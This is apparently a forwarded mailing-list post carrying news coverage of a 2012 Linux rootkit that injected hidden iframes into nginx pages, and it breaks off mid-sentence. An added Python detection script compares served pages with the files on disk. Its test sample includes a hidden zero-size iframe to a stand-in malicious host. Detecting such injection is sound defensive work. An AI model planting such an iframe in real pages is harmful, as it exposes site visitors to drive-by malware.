From: Ruben Safir
Subject: [NYLXS - HANGOUT] Linux security news
New Linux Rootkit Uncovered
The malware appears to be contract work by an intermediate-level Russian
programmer, according to an analysis by CrowdStrike.
By Jeff Goldman | November 22, 2012
New Linux malware was recently discovered by a user who published its
details on the Full Disclosure mailing list.
"The anonymous poster, who runs a web service, found the rootkit on
company servers after customers said they were redirected to malicious
sites," writes SC Magazine's Danielle Walker.
"The binary is more than 500k, but its size is due to the fact that it
hasn't been stripped (i.e. it was compiled with the debugging
information)," writes Kaspersky's Marta Janus. "Perhaps it's still in
the development stage, because some of the functions don’t seem to be
fully working or they are not fully implemented yet."
"The software nasty targets machines running 64-bit GNU/Linux and a web
server, and acts like a rootkit by hiding itself from administrators,"
writes The Register's John Leyden. "A browser fetching a website served
by the compromised system will be quietly directed via an HTML iframe to
malicious sites loaded with malware to attack the web visitor's machine."
"Considering that this rootkit was used to non-selectively inject
iframes into nginx webserver responses, it seems likely that this
rootkit is part of a generic cyber crime operation and not a targeted
attack," CrowdStrike senior security researcher Georg Wicherski wrote in
a detailed analysis. "However, a Waterhole attack, where a site mostly
visited from a certain target audience is infected, would also be
plausible. Since no identifying strings yielded results in an Internet
search ... it appears that this is not a modification of a publicly
available rootkit. Rather, it seems that this is contract work of an
intermediate programmer with no extensive kernel experience, later
customized beyond repair by the buyer."
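The injection behaviour described above, as an added example that is not from the article or from any of the analyses it quotes: a small Python check that compares the HTML a server actually returns against the file it was supposed to serve and reports iframes that appear only in the served copy, flagging the ones sized or styled to be invisible. The sample pages and the `evil.invalid` hostname are constructed for this example; `fetch_served` is a convenience helper for a live comparison and is not called by the offline sample.

```python
import re
import urllib.request
from html.parser import HTMLParser


class _IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> start tag in a document."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            # attrs is a list of (name, value); value is None for bare attributes
            self.iframes.append({k: (v or "") for k, v in attrs})


def extract_iframes(html):
    """Return a list of attribute dicts, one per <iframe> in the HTML."""
    parser = _IframeCollector()
    parser.feed(html)
    parser.close()
    return parser.iframes


_HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)


def looks_hidden(attrs):
    """Heuristic: a frame styled invisible or sized 0x0/1x1 is there for a
    drive-by download, not for the visitor to see."""
    if _HIDDEN_STYLE.search(attrs.get("style", "")):
        return True
    try:
        width = int(attrs.get("width", "100"))
        height = int(attrs.get("height", "100"))
    except ValueError:
        return False  # percentages or junk; leave those for manual review
    return width <= 1 or height <= 1


def injected_iframes(disk_html, served_html):
    """Iframes whose src is in the served response but not in the file on
    disk. Each hit carries a 'hidden' flag from looks_hidden()."""
    expected = {f.get("src", "") for f in extract_iframes(disk_html)}
    hits = []
    for frame in extract_iframes(served_html):
        src = frame.get("src", "")
        if src not in expected:
            hits.append({"src": src, "hidden": looks_hidden(frame)})
    return hits


def fetch_served(url, user_agent="Mozilla/5.0"):
    """Fetch a page the way a browser would. Run this from a machine other
    than the web server: a kernel rootkit hides from tools run on the box,
    but it cannot hide what the box sends over the wire."""
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    with urllib.request.urlopen(req, timeout=10) as resp:
        charset = resp.headers.get_content_charset() or "utf-8"
        return resp.read().decode(charset, "replace")


# Constructed sample: the file on disk, and the same page as a compromised
# server might return it, with one extra invisible frame appended.
DISK_HTML = """<html><body>
<h1>Welcome</h1>
<iframe src="https://www.example.com/embed/legit" width="400" height="300"></iframe>
</body></html>
"""

SERVED_HTML = DISK_HTML.replace(
    "</body>",
    '<iframe src="http://evil.invalid/x.php" width="0" height="0" '
    'style="display:none"></iframe></body>',
)


if __name__ == "__main__":
    for hit in injected_iframes(DISK_HTML, SERVED_HTML):
        print("injected iframe:", hit["src"], "(hidden)" if hit["hidden"] else "")
```

In practice you would pair `fetch_served("http://your-host/")` with the matching file under the document root and feed both to `injected_iframes`; a legitimate embed that changed on disk shows up too, so treat hits as leads to confirm, not as proof of compromise. Because the check reads only what the server sends, it works even when the rootkit is hiding its module and files from everything run locally.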
"The firm, looking at the tools, techniques and procedures employed and
some background information it could not disclose, suggested the creator
of the rootkit was likely to be Russian," writes TechWeekEurope's Tom